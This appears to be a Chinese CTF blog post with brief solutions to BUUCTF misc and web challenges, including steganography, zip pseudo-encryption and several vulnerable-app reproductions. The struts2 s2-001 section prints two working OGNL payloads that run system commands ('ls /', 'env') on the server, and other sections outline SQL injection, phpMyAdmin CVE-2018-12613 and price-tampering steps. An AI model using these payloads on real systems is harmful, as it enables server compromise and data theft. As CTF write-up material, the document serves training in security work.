BUUCTF-做题记录

很久没做题了,还是随便来水一水吧,之前都在学别的。

目录

[INSHack2017]remote-multimedia-controller

流量包,因此选择直接搜看有没有flag

针对该流进行tcp流的跟踪。

发现存在一个特殊字符串,用CyberChef直接梭

flag:

flag{TCP_s0ck3t_4n4lys1s_c4n_b3_fun!}

[INSHack2017]hiding-in-plain-sight

直接用tokeii👴网站的工具

然后将foremost后的结果进行下载。

得到隐藏的flag

flag:

flag{l337_h4xx0r5_c0mmun1c473_w17h_PNGs}

[QCTF2018]X-man-Keyword

查看lsb,发现通道内有东西,直接用脚本解得到一串字符。

PVSF{vVckHejqBOVX9C1c13GFfkHJrjIQeMwf}

根据lovekfc,然后进行关键字解密

再根据大小写修改一一对应的位置,得到真正的flag

flag{cCgeLdnrIBCX9G1g13KFfeLNsnMRdOwf}

[BSidesSF2019]diskimage

老样子zsteg梭一下

提取出该数据

然后利用kali自带的testdisk提取其中的图片

testdisk 1.dat

把这个图片重命名为1.png打开得到flag

flag:

flag{FAT12_FTW}

[2022红包题]虎年大吉

工具题,用ciphey直接解

flag:

flag{29186995}

[WMCTF2020]行为艺术

打开后有hint.txt,内容

md5sum flag.zip

17f5b08342cf65f6dc08ed0b4c9bd334 flag.zip

另一个文件则是一个图片,里面有504B开头,盲猜应该是一个压缩包的十六进制,但是好像没看见尾部,所以修改图片的高度。

得到完整的图片

提取出来得到

504B0304140000000800DB93C55086A39007D8000000DF01000008000000666C61672E74787475504B0E823010DD93708771DDCCB0270D5BBD0371815A9148AC6951C2ED9D271F89C62E2693D7F76BB7DE9FC80D2E6E68E782A326D2E01F81CE6D55E76972E9BA7BCCB3ACEF7B89F7B6E90EA16A6EE2439D45179ECDD1C5CCFB6B9AA489C1218C92B898779D765FCCBB58CC920B6662C5F91749931132258F32BBA7C288C5AE103133106608409DAC419F77241A3412907814AB7A922106B8DED0D25AEC8A634929025C46A33FE5A1D3167A100323B1ABEE4A7A0708413A19E17718165F5D3E73D577798E36D5144B66315AAE315078F5E51A29246AF402504B01021F00140009000800DB93C55086A39007D8000000DF010000080024000000000000002000000000000000666C61672E7478740A00200000000000010018004A0A9A64243BD601F9D8AB39243BD6012D00CA13223BD601504B050600000000010001005A000000FE00000000000000

得到加密后的zip文件。

利用010查看发现是一个伪加密,修改对应的位由09改为00

打开后有一个典型的brainfuck编码

利用网站一把梭

flag:

flag{wai_bi_baaaa_bo!2333~~~}

[MRCTF2020]寻找xxx

打开来有个wav,里面是拨号音,直接丢在线解码工具进行解,得到号码。

(由于在BUUCTF进行复现,所以只能做到这一步)

flag去网上随便找的

flag{Oh!!!!!_Y0u_f1nd_my_secret}

[ThinkPHP]IN SQL INJECTION

利用payload获取数据库名

然后在爆破信息里面就有flag了

[PHPMYADMIN]CVE-2018-12613

先利用sql执行输入phpinfo

查看一下session的 值

由于session已经进行了存储,因此可以直接访问session 的文件得到phpinfo()

查到flag

[struts2]s2-001

利用payload实现命令执行

在password框内输入要执行的命令

%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"ls","/"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}

根据经验,一般都在env环境变量当中有flag

%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"env"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}

[第三章 web进阶]逻辑漏洞

打开一个登陆界面,然后随便输入admin/123进行登陆

进入后有个卖书的位置

直接买flag买不起

尝试购买nice,发现可以购买

利用购买的成功请求包,将cost参数改成复数。

改成-9999

重新购买得到flag

相关推荐
centos081 天前
PWN(栈溢出漏洞)-原创小白超详细[Jarvis-level0]
网络安全·二进制·pwn·ctf
Sweet_vinegar1 天前
变异凯撒(Crypto)
算法·安全·ctf·buuctf
Mr_Fmnwon1 天前
【我的 PWN 学习手札】House of Roman
pwn·ctf·heap
真学不来3 天前
ACTF新生赛2020:NTFS数据流
网络·笔记·python·安全·ctf
安红豆.3 天前
[NewStarCTF 2023 公开赛道]逃1
web安全·网络安全·ctf
A5rZ4 天前
CTF-WEB: python模板注入
ctf
梦 & 醒4 天前
【刷题11】CTFHub技能树sql注入系列
数据库·sql·网络安全·ctf
真学不来8 天前
GXYCTF2019:gakki
笔记·python·安全·ctf
安红豆.8 天前
[Zer0pts2020]Can you guess it?1
web安全·网络安全·php·ctf
Gnevergiveup9 天前
源鲁杯2024赛题复现Web Misc部分WP
安全·网络安全·ctf·misc